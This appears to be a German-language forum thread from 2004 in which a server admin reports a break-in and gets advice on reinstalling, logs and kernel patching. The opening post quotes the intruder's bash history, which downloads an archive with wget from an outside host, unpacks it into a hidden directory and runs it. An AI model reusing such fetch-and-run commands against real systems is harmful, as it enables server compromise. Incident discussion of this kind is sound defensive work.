Page 1 of 2
Server gehackt?
Posted: 2004-02-03 08:38
by as-n
Hallo,
eine rmeienr Server hat gestern den SSL Port eigenmächtig geändert.
In der Bash History fand ich das:
cat /etc/issue
wget users.volja.net/conso/fu.tgz
tar fu.tgz
tar xvf fu.tgz
cd .fuckZ
rm -rf " "
./start Kd9f4
exit
Sieht IMHO nach gehackt aus, oder?
Kann man das prüfen?
Ciao André
Re: Server gehackt?
Posted: 2004-02-03 08:48
by captaincrunch
Sieht IMHO nach gehackt aus, oder?
Ja
Kann man das prüfen?
Wenn derjenige gut war, wirst du da relativ wenig Chancen haben. Einfachste Methode: Nutzdaten sichern, Reinitialisierung.
Re: Server gehackt?
Posted: 2004-02-03 08:53
by yt
Gut war er nciht unbedingt, wenn er Spuren in der history hinterlässt. Aber der einzige Weg ist:
* Backup der Nutzdaten und Logs
* Reinitialisierung
Re: Server gehackt?
Posted: 2004-02-03 08:54
by as-n
Vielleicht finde ich heraus wer es war, wo in den Logs habe ich da etwaige Chancen eine IP zu finden etc?
Re: Server gehackt?
Posted: 2004-02-03 08:59
by captaincrunch
/var/log/*
Re: Server gehackt?
Posted: 2004-02-03 09:04
by as-n
Also überall, naja, ich werde erstmal den Server reinitalisieren und dann beschäftige ich mich mit den logs.
Re: Server gehackt?
Posted: 2004-02-03 09:08
by captaincrunch
Btw.: In wessen .bash_history hast du die Einträge gefunden?
Re: Server gehackt?
Posted: 2004-02-03 09:09
by as-n
In der von root, aber es gab dann noch einen user secteam mit root-Rechten.
Re: Server gehackt?
Posted: 2004-02-03 11:52
by as-n
Wie finde ich die Shwachstelle in meinem System, irgedn wie muss der Kerl ja rein gekommen sein.
Nessus hat bei der letzten Ã?berprüfung nichts schwerwiegendes entdeckt.
Ich möchte den gleichen Fehler nicht wieder machen, aber welcher war es?
Ciao
André
Re: Server gehackt?
Posted: 2004-02-03 12:40
by Joe User
Welche PHP-Scripte nutzt Du? War der Apache aktuell? Kernelversion?
Re: Server gehackt?
Posted: 2004-02-03 12:56
by as-n
Apache 1.3.28
Kernel war der der orginal SuSE8.1 Distri
An php war nur der osCommerce Shop drauf.
Ciao
André
Re: Server gehackt?
Posted: 2004-02-03 13:16
by checker
AS-N wrote:
Kernel war der der orginal SuSE8.1 Distri
Ciao
André
Dürfte an dem kernel liegen oder hast du den immer schön gepacht?
Re: Server gehackt?
Posted: 2004-02-03 13:22
by as-n
Naja, das was fou4s und yast vorgeschlagen haben, aber ob da Kernel Patches dabei waren weiß ich ehrlich gesagt nicht.
Jedenfalls ist jede nacht fou4s gelaufen.
Re: Server gehackt?
Posted: 2004-02-03 13:54
by as-n
Also ich finde in den Logs gar nix, kann aber auch daran liegen, dass ich keine genauen Suchkriterien habe.
Re: Server gehackt?
Posted: 2004-02-03 14:11
by Joe User
Vergiss die Logs, denen kannst Du nach einem ungebetenem Besuch genauso wenig trauen, wie den Binarys und Libs. Sicher die Nutzdaten (www,sqldump,config) und lass' die Kiste neu aufsetzen. Während der Reinitialisierung suchst Du nach Lücken in den PHP-Scripten und überdenkst die Notwendigkeit der von Dir angebotenen Dienste, sowie deren Konfiguration.
Re: Server gehackt?
Posted: 2004-02-04 09:01
by as-n
So, der Server läuft wieder, der Ke5nel war im Ã?brigen 2.4.23, daran kann es wohl nicht gelegen habne, oder?
Jetzt hätte ich noch webmin, nessus oder mysql im Verdacht, aber von allen waren die neusten Versionen drauf.
Macht yast jetzt eigentlich Kernelupdates automatisch?
Ciao
André
Re: Server gehackt?
Posted: 2004-02-04 09:06
by captaincrunch
der Ke5nel war im Ã?brigen 2.4.23, daran kann es wohl nicht gelegen habne, oder?
Natürlich kann es daran gelegen haben. Die mremap-Lücke betraf diese Version noch, wobei sämtliche Exploits, die diese Lücke ausnutzen auf einem sauber gewarteten System ziemlich schnell auffallen.
Was genau es war lässt sich für Außenstehende ohne genaue Kenntnis deines Setups allerdings nur erraten.
Re: Server gehackt?
Posted: 2004-02-04 09:11
by as-n
Wenn der 2.4.23 noch betroffen ist, wie kann ich den dann patchen und auf welche Version und wo bekomme ich die her, auf der SuSE site finde ich nur ältere Versionen.
:?:
Re: Server gehackt?
Posted: 2004-02-04 10:35
by as-n
Ich habe jetzt versucht den Kernel manuell upzudaten, grob nach folgender Anleitung:
Code: Select all
#!/bin/bash
cd /usr/src
# Kernel downloaden (~25MB)
wget --passive-ftp
ftp://ftp.de.kernel.org/pub/linux/kernel/v2.4/linux-2.4.22.tar.bz2
# Kernel entpacken
tar -xjf linux-2.4.22.tar.bz2
# Symlink erstellen
ln -s linux-2.4.22 linux
cd linux
# Aktuelle Kernel-Config abspeichern
gzip -dc /proc/config.gz >.config
# Kernel-Config 'aufr umen'
make oldconfig
# Kernel kompilieren (kann dauern)
make dep clean bzImage modules modules install
# Alten Kernel sichern
cp /boot/vmlinuz /boot/vmlinuz.old
# Neuen Kernel installieren
cp arch/i386/boot/bzImage /boot/vmlinuz
# Bootloader einrichten
# Wenn du LiLo verwendest einfach 'lilo' aufrufen.
# Wenn du Grub verwendest musst du nichts machen.
# Und zuletzt - Neustarten
Leider geht schon..
nicht, der Symlink ist zwar da, aber ...naja.
Also..
Dann..
No such file or directory
Code: Select all
cp /boot/vmlinuz /boot/vmlinuz.old
No such file or directory
So bekomme ich das nicht hin :-(
Re: Server gehackt?
Posted: 2004-02-04 13:41
by as-n
Hallo,
also, es handelt sich um einen speziellen Kernel für den Server, für den es natürlich auch kein Update von SuSE gibt.
Die config.gz existiert auch nicht, da der Kernel ohne diese Option kompiliert wurde.
Kann ich die config.gz irgend wo anders rauslesen?
Re: Server gehackt?
Posted: 2004-02-04 15:14
by as-n
Hat keiner eine Idee?
Ciao
André
Re: Server gehackt?
Posted: 2004-02-04 16:43
by giffi
Schau mal unter /boot nach da war jedenfalls bei mir eine config.
Giffi
Re: Server gehackt?
Posted: 2004-02-04 17:06
by as-n
Hallo,
es gibt definitiv keine config. Der Kernel wurde ohne diese Option kompiliert, leider. :(
Re: Server gehackt?
Posted: 2004-02-04 19:27
by checker
AS-N wrote:Hallo,
es gibt definitiv keine config. Der Kernel wurde ohne diese Option kompiliert, leider. :(
??? Keine config datei und wie will man dann einstellungen bearbeiten und ändern? :roll: :!:
MfG checker
Re: Server gehackt?
Posted: 2004-02-04 21:08
by Joe User